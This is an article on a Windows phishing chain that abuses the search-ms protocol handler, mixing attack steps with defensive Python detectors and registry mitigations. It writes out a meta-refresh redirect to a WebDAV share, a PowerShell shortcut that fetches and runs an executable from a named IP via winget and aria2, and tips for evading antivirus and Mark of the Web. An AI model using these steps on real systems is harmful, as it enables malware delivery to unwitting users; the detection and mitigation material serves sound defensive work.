Infection according to Feng Shui, or analysis of an attack through Windows vulnerabilities
Disclaimer! After reading the article, the reader will gain a practical understanding of possible attacker actions and of methods for conducting exercises. Information security specialists will become familiar with recommendations for protecting infrastructure within the framework of a contract or employment agreement. Remember that any use of the information provided should be limited to training. The author is not responsible for any negative consequences arising from unauthorized use of the article's materials and the information obtained from them.
Step 0. Attack concept
Classically, the first stage is delivered in the usual ways: mail, instant messengers, dropped flash drives, etc. Files transmitted through these channels have long been under suspicion, and security tools usually block them using static and dynamic analysis. This attack, however, relies on a specific feature of Windows Explorer, or more precisely on abuse of the search-ms protocol handler, which can be made to search for malicious files on a third-party server.
Expected behaviour of search-ms when searching for .exe files:
The handler is invoked with a string of arguments:
search-ms:displayname=Search Results in Data (D:)&crumb=fileextension:~<.exe OR System.Generic.String:.exe&crumb=location:D:\
The search-ms handler is passed arguments for searching files; let's look at them in detail:
- displayname sets the text shown to the user as the search location (any string can be used);
- the crumb argument defines filters and the search location;
- query can also be used to filter the results.
A malicious request looks like this:
search-ms:query=.exe&crumb=location:\\95.173.18.16\DavWWWRoot\&displayname=Update
The query parameter filters files by the .exe mask, and the crumb parameter, through a UNC path, points to the server where the malware is already stored. Microsoft has partially addressed the security of such files: every file received from the network gets a Mark of the Web (MOTW) in an alternate data stream, which is read when the file is opened and results in a warning.
However, this flow is still cumbersome and suspicious to the end user: even a minimally trained employee knows that an .exe file is unlikely to contain anything useful for them. After refining the mechanism, the following attack scheme was used in the exercises; the material can also be used for "anti-phishing exercises".
To deliver the malicious search-ms request, URL schemes are used, disguised as a button on a website or another element. The scheme makes the client contact a third-party server where the first-stage malware has already been prepared. The user launches an inconspicuous file that looks like a downloaded "pdf"; it downloads the second stage with the main core of the malware, after which the system is infected. Let's look at this in practice.
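To make the parameter semantics above concrete from the defender's side, here is a small parser and classifier for search-ms: URIs. It is an added example, not code from the article: it splits the URI into displayname, crumb and query, undoes percent-encoding, and flags any crumb=location: that names a UNC host (the WebDAV delivery path described above) rather than a local drive. The host relay.example in the sample input is a constructed placeholder.

```python
"""Parse and classify search-ms: URIs (added example, not code from the article).

The search-ms handler takes displayname, crumb and query parameters separated
by '&'. A crumb of the form location:<path> decides where Explorer searches:
a local drive letter is harmless, while a UNC path such as \\host\DavWWWRoot\
makes the WebDAV client fetch a listing from a remote server. The classifier
below is meant for a mail gateway or a SIEM enrichment step.
"""
from __future__ import annotations
import re
from dataclasses import dataclass, field
from urllib.parse import unquote

# crumb=location: values: a UNC prefix means remote, a drive letter means local.
UNC_RE = re.compile(r"^\\\\([^\\]+)\\")


@dataclass
class SearchMsUri:
    displayname: str | None = None
    query: str | None = None
    crumbs: list[str] = field(default_factory=list)
    unknown: dict[str, str] = field(default_factory=dict)


def parse_search_ms(uri: str) -> SearchMsUri:
    """Split a search-ms: URI into its parameters; percent-encoding is undone first."""
    scheme, sep, rest = uri.partition(":")
    if not sep or scheme.strip().lower() != "search-ms":
        raise ValueError(f"not a search-ms URI: {uri!r}")
    parsed = SearchMsUri()
    for part in unquote(rest).split("&"):
        if not part:
            continue
        key, _, value = part.partition("=")
        key = key.strip().lower()
        if key == "displayname":
            parsed.displayname = value
        elif key == "query":
            parsed.query = value
        elif key == "crumb":
            parsed.crumbs.append(value)
        else:
            parsed.unknown[key] = value
    return parsed


def remote_hosts(parsed: SearchMsUri) -> list[str]:
    """Hosts named by every crumb=location: that points at a UNC path."""
    hosts = []
    for crumb in parsed.crumbs:
        name, _, value = crumb.partition(":")
        if name.strip().lower() != "location":
            continue
        match = UNC_RE.match(value.strip())
        if match:
            hosts.append(match.group(1))
    return hosts


def classify(uri: str) -> dict:
    """Verdict plus human-readable reasons for a single search-ms: URI."""
    parsed = parse_search_ms(uri)
    hosts = remote_hosts(parsed)
    reasons = []
    if hosts:
        reasons.append("search location is a remote UNC share: " + ", ".join(hosts))
    if any("davwwwroot" in crumb.lower() for crumb in parsed.crumbs):
        reasons.append("path uses the WebDAV DavWWWRoot alias")
    if parsed.query and parsed.query.lower().lstrip("*").startswith((".exe", ".lnk")):
        reasons.append("query filters for executable content: " + parsed.query)
    return {
        "suspicious": bool(hosts),
        "remote_hosts": hosts,
        "displayname": parsed.displayname,
        "reasons": reasons,
    }


# Constructed inputs: the benign local search from the article and a remote-share
# variant with a placeholder host (relay.example is not a real address).
LOCAL_URI = ("search-ms:displayname=Search Results in Data (D:)"
             "&crumb=fileextension:~<.exe OR System.Generic.String:.exe&crumb=location:D:\\")
REMOTE_URI = r"search-ms:query=.exe&crumb=location:\\relay.example\DavWWWRoot\&displayname=Update"

if __name__ == "__main__":
    for sample in (LOCAL_URI, REMOTE_URI):
        print(classify(sample))
```

The verdict is driven only by the location crumb; the DavWWWRoot alias and the executable filter are reported as supporting reasons, since a remote location alone is enough to send the client to an attacker's WebDAV share regardless of what is displayed in the window title.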
Step 1. Delivery stage
At this stage the delivery files are assembled and the infrastructure that the user will contact at the moment of infection is set up. The specifics of the target network and of the security systems that can detect malicious activity also need to be taken into account.
Relay server
For delivery, a server must be set up that the client will contact to search for the malicious file on it. The requirements for this stage are:
- no authentication, to simplify the infection path;
- no write access for other parties;
- the service must be close to the client in network terms.
The last point stems from a drawback of this delivery method: the WebDAV client service is first started on the client side, and only then does it contact the server, sending PROPFIND and GET requests. All of this can take 10 to 15 seconds, during which the application appears frozen to the user. As the server software we will take WsgiDAV, written in Python, and start it with the command:
wsgidav --host 0.0.0.0 --port 80 --root /tmp/Minfin --auth anonymous
This binds the server to every interface on the standard port 80, sets the root folder where the first-stage malware will be stored, and enables anonymous authentication. By default the root folder is writable, but this can be changed in the server configuration. Let's move on to the URL and consider the delivery methods.
Packed URL
To deliver the infected link to a user, emails with disguised elements are usually used: for example, an unobtrusive message about indexing the employee's salary, with a button containing the link at the bottom.
Note, however, that URL schemes are handled by the browser, not by the mail client, so the handler cannot be invoked directly from the email; a web server is also needed, on which the redirect to the scheme takes place.
The right HTML element must also be chosen, because most mail clients have learned to detect phishing emails. Submit buttons and JavaScript actions will not work, since they are flagged as malicious or JavaScript is simply not supported by the mail client. In this case an ordinary button with a link is used, and the page on the web server may look approximately like this:
<html lang="en"><head><meta charset="UTF-8"/><meta http-equiv="refresh" content="2; url=search-ms:query=.lnk&crumb=location:\\93.183.72.112\DavWWWRoot\&displayname=Update"/><title>Redirecting...</title></head><body></body></html>
Next, the user will be prompted to open Explorer and continue in it.
After that, a request is made to the WebDAV server and the filtered contents of the root folder of the requested resource are opened.
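A mail gateway or URL sandbox can catch this delivery step before the browser ever hands the URI to a protocol handler. The following added example (not code from the article) walks an HTML page with the standard-library HTML parser, collects meta-refresh targets and anchor hrefs, and reports every one whose scheme is not plain http, https or mailto. The sample page mirrors the redirect above but uses the constructed placeholder host relay.example; the allowlist of web schemes is an assumption to be adjusted per environment.

```python
"""Find links and redirects on an HTML page that target non-web URI schemes.

Added example, not from the article. Browsers hand search-ms:, ms-excel: and
similar URIs straight to a local protocol handler, so a mail gateway or URL
sandbox can flag any <meta http-equiv="refresh"> target or <a href> whose
scheme is outside a small allowlist before a user clicks it.
"""
from __future__ import annotations
import re
from html.parser import HTMLParser

# Schemes a browser may open without review (assumption; extend as needed).
WEB_SCHEMES = {"http", "https", "mailto"}
SCHEME_RE = re.compile(r"^\s*([a-zA-Z][a-zA-Z0-9+.-]*):")
# "<seconds>; url=<target>" as used by meta refresh; quotes around the target are optional.
REFRESH_RE = re.compile(r"^\s*\d+\s*;\s*url\s*=\s*['\"]?(.+?)['\"]?\s*$", re.IGNORECASE)


class RedirectCollector(HTMLParser):
    """Collects (source, uri) pairs from meta-refresh and anchor tags."""

    def __init__(self) -> None:
        super().__init__()
        self.targets: list[tuple[str, str]] = []

    def handle_starttag(self, tag: str, attrs) -> None:
        attr = {name.lower(): (value or "") for name, value in attrs}
        if tag == "meta" and attr.get("http-equiv", "").lower() == "refresh":
            match = REFRESH_RE.match(attr.get("content", ""))
            if match:
                self.targets.append(("meta-refresh", match.group(1)))
        elif tag == "a" and "href" in attr:
            self.targets.append(("href", attr["href"]))


def scheme_of(uri: str) -> str | None:
    """Scheme of an absolute URI, lower-cased, or None for relative links."""
    match = SCHEME_RE.match(uri)
    return match.group(1).lower() if match else None


def find_non_web_targets(html: str) -> list[dict]:
    """Every redirect or link that a browser would dispatch to something other than a web server."""
    collector = RedirectCollector()
    collector.feed(html)
    collector.close()
    findings = []
    for source, uri in collector.targets:
        scheme = scheme_of(uri)
        if scheme is not None and scheme not in WEB_SCHEMES:
            findings.append({"source": source, "scheme": scheme, "uri": uri})
    return findings


# Constructed sample: a redirect page like the one above, with a placeholder host,
# plus one harmless intranet link and one link to the Excel protocol handler.
SAMPLE_HTML = (
    '<html lang="en"><head><meta charset="UTF-8"/>'
    '<meta http-equiv="refresh" content="2; url=search-ms:query=.lnk'
    '&crumb=location:\\\\relay.example\\DavWWWRoot\\&displayname=Update"/>'
    '<title>Redirecting...</title></head>'
    '<body><a href="https://intranet.example/salary">Salary indexation</a>'
    '<a href="ms-excel:ofv|u|http://10.0.0.3/Book1.xlsx">Open sheet</a></body></html>'
)

if __name__ == "__main__":
    for finding in find_non_web_targets(SAMPLE_HTML):
        print(finding)
```

An allowlist is deliberately used instead of a denylist of known-bad schemes: the number of registered protocol handlers on a Windows host is large, and any of them is a candidate for the same trick.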
Step 2. Infection stage
Classic typosquatting and control characters in file names have long since ceased to surprise anyone, and EPP and EDR solutions easily recognize popular patterns using YARA rules or dynamic analysis. Accordingly, a different solution is needed, one that does not arouse the user's suspicion.
Since the connection to the server is made through Explorer as the client, the items are displayed according to the rules of the desktop.ini file. This means that malicious shortcuts that open PowerShell can be used here.
Open the shortcut wizard and specify the standard path to PowerShell. Options and commands can be appended to this path, and the interpreter will start with them by default. Since the goal of the first stage is not to carry the whole malicious payload but to disguise itself, download the second stage and launch it, the access to the server must be disguised. To do this, create a regular shortcut with the path to PowerShell.
Let's choose a suitable icon for masking.
Then the shortcut needs to be given its logic. At this point there is already access to a shell, and hence control of the device within the rights of the user under which the application runs. These are usually unprivileged users, but that is quite enough to open connections and make changes on the device. When composing the logic, proceed from:
- the character limit of the target line;
- avoiding system folders and utilities that require administrator rights;
- a small exploit file size;
- disguise as a legitimate process;
- hidden windows.
If a standard utility or object is chosen for the job, such as a .NET network object, Invoke-WebRequest, or a BITS transfer, the connection is blocked immediately by behavioural analysis and the file is sent to quarantine.
Accordingly, built-in utilities present on most devices must be used to pass as legitimate processes. For example, winget is a great choice: a package manager that opens network connections and downloads the required software.
Without administrator rights it is not possible to register a new source and download the malicious package directly, so a utility is needed that installs and runs without administrator rights and is designed for downloading over HTTP. One such utility turned out to be aria2, an open-source downloader.
Let's put together the logic of the first stage:
Installing the utility -> updating environment variables -> downloading the malware -> launching the second stage of infection
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe winget install aria2.aria2 -h;.(echo $PSHOME'\powershell.exe')'aria2c http://93.183.72.112/assets/120.exe';.\120.exe
The main trick in this line is starting a fresh shell so that the updated environment variables are picked up, since without this the utility is hard to reach. The reason for not using an absolute path is the character limit of the shortcut's target string.
The logic is implemented simply, without masking file names or any other tricks to hide from signature or behavioural analysis, since the utilities used are legitimate in the system.
Checking the file for antivirus detections, we notice only 4 detections! And if a domain is used instead of the IP address and https instead of http, there may be even fewer.
All that remains is to place any binary file or instructions on the server at http://93.183.72.112/assets/ under the name 120.exe, as well as the first-stage malware. In this solution the MOTW mark is preserved and the user will be warned about the file. To avoid it, any file type that does not support MOTW can be used, with the code embedded in it. Alternatively, software that does not propagate MOTW can be used, such as some language runtimes (Java, Python, Ruby) or Microsoft's own Visual Studio.
ISO and VHD files, however, do not carry the mark inside at all, since the mark is stored as an alternate data stream of the container file in the host file system, while the ISO or VHD itself contains another file system that is mounted in the OS.
Step 3. Attack prevention measures for information security staff
This attack is a linear scenario, so to neutralize the vector it is enough to forbid opening the search-ms protocol from the browser by deleting its registry keys. In Windows, the keys under HKEY_CLASSES_ROOT store the associations of file types and protocols with applications.
Among them, the associations for search-ms and search must be found. Deleting the registry keys associated with these protocols means that the operating system and applications can no longer use them to perform the corresponding actions. This effectively blocks these protocols, preventing their use, for example, by web browsers. Run the following commands to prevent the attack:
reg delete HKEY_CLASSES_ROOT\search /f; reg delete HKEY_CLASSES_ROOT\search-ms /f
Particular attention in this chain should be paid to URL schemes, since a large number of protocol-to-application associations exist.
Another attack vector is quite possible through a malicious link in the browser that targets system software, including office applications. By default even Excel has a registered URL scheme, so in theory an Excel file can be launched simply by clicking a link:
ms-excel:ofv|u|http://10.0.0.3/Book1.xlsx
Or a vector similar to the one described earlier, but using SFTP for the transfer.
The question of URL scheme security remains open, since this is an obvious attack vector with a fairly short path for an intruder into the system. To neutralize it, one can use both the radical measure of deleting protocol associations and detection and response rules in SIEM, EPP, EDR and SOAR for access to the important registry keys.
Unfortunately, vendors are not always quick to fix system vulnerabilities, so it is quite important to conduct your own research and analysis of infrastructure security, and not to forget about vulnerability management.
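As a starting point for the SIEM/EDR rules mentioned above, here is an added example (not from the article) that evaluates four detections over constructed process-creation and registry events whose field names are modelled on Sysmon records: PowerShell spawned by Explorer with a "winget install ... ; aria2c ..." command line (the Step 2 chain), a shell whose working directory is a UNC/WebDAV share, a search-ms: URI on any command line, and a write to the search or search-ms handler keys. The rule names, the placeholder host relay.example and the user name are all assumptions.

```python
"""Sample detections for the search-ms / WebDAV / PowerShell chain described above.

Added example, not from the article. The events below are constructed, with
field names modelled on Sysmon process-creation (event 1) and registry
(event 13) records; rule names and patterns are assumptions to be tuned.
  R1  a shell spawned by explorer.exe whose command line installs a package
      and then calls a downloader (winget install ... ; aria2c ...)
  R2  a shell started with a UNC/WebDAV share as its working directory
  R3  a search-ms: URI on any command line
  R4  a write to the search or search-ms protocol handler keys
"""
from __future__ import annotations
import json
import re

WINGET_INSTALL = re.compile(r"\bwinget(\.exe)?\s+install\b", re.IGNORECASE)
DOWNLOADER = re.compile(r"\b(aria2c|curl|wget|certutil|bitsadmin)(\.exe)?\b", re.IGNORECASE)
UNC_DIR = re.compile(r"^\\\\[^\\]+\\")
SEARCH_MS_URI = re.compile(r"\bsearch-ms:", re.IGNORECASE)
# HKCR is a merged view of these hives; match whichever spelling the sensor logs.
HANDLER_KEY = re.compile(
    r"^(HKCR|HKLM\\SOFTWARE\\Classes|HKU\\[^\\]+\\Software\\Classes)\\(search|search-ms)\\",
    re.IGNORECASE,
)
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}


def image_name(path: str) -> str:
    """Basename of an image path, lower-cased."""
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(event: dict) -> list[str]:
    """Return the names of every rule the event matches."""
    hits = []
    image = image_name(event.get("Image", ""))
    parent = image_name(event.get("ParentImage", ""))
    cmdline = event.get("CommandLine", "")
    cwd = event.get("CurrentDirectory", "")
    if (image in SHELLS and parent == "explorer.exe"
            and WINGET_INSTALL.search(cmdline) and DOWNLOADER.search(cmdline)):
        hits.append("R1_explorer_spawns_shell_with_winget_downloader")
    if image in SHELLS and UNC_DIR.match(cwd):
        hits.append("R2_shell_started_from_unc_share")
    if SEARCH_MS_URI.search(cmdline):
        hits.append("R3_search_ms_uri_on_command_line")
    if event.get("EventType") == "SetValue" and HANDLER_KEY.match(event.get("TargetObject", "")):
        hits.append("R4_search_protocol_handler_key_modified")
    return hits


def scan(lines) -> list[tuple[str, str, str]]:
    """Run every rule over JSON-lines events; returns (time, image, rule) triples."""
    findings = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        for rule in evaluate(event):
            findings.append((event.get("UtcTime", "?"), event.get("Image", "?"), rule))
    return findings


# Constructed events (placeholder host relay.example, fictional user "alice").
SAMPLE_EVENTS = [
    {"UtcTime": "2024-05-01 09:00:01", "EventID": 1, "Image": r"C:\Windows\explorer.exe",
     "ParentImage": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "CommandLine": r'explorer.exe "search-ms:query=.lnk&crumb=location:\\relay.example\DavWWWRoot\&displayname=Update"',
     "CurrentDirectory": r"C:\Users\alice"},
    {"UtcTime": "2024-05-01 09:00:19", "EventID": 1,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe winget install aria2.aria2 -h; aria2c http://relay.example/assets/stage2.exe; .\stage2.exe",
     "CurrentDirectory": r"\\relay.example\DavWWWRoot"},
    {"UtcTime": "2024-05-01 09:05:00", "EventID": 1,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -File C:\Scripts\backup.ps1",
     "CurrentDirectory": r"C:\Users\alice"},
    {"UtcTime": "2024-05-01 09:06:00", "EventID": 1,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\WindowsApps\WindowsTerminal.exe",
     "CommandLine": r"powershell.exe winget install Git.Git",
     "CurrentDirectory": r"C:\Users\alice"},
    {"UtcTime": "2024-05-01 09:10:00", "EventID": 13, "EventType": "SetValue",
     "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKLM\SOFTWARE\Classes\search-ms\shell\open\command\(Default)"},
]
SAMPLE_LINES = [json.dumps(event) for event in SAMPLE_EVENTS]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LINES):
        print(finding)
```

R4 complements the reg delete commands above: once the handler keys are removed, any later write to them is itself a useful alert, since nothing legitimate should recreate them on a workstation.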
The article is supported by the Serverspace team.
Serverspace is a cloud services provider renting out virtual servers with Linux and Windows in 8 data centers: Russia, Belarus, Kazakhstan, the Netherlands, Turkey, the USA, Canada and Brazil. To build an IT infrastructure, the provider also offers network creation, gateways, backups, CDN services, DNS and S3 object storage.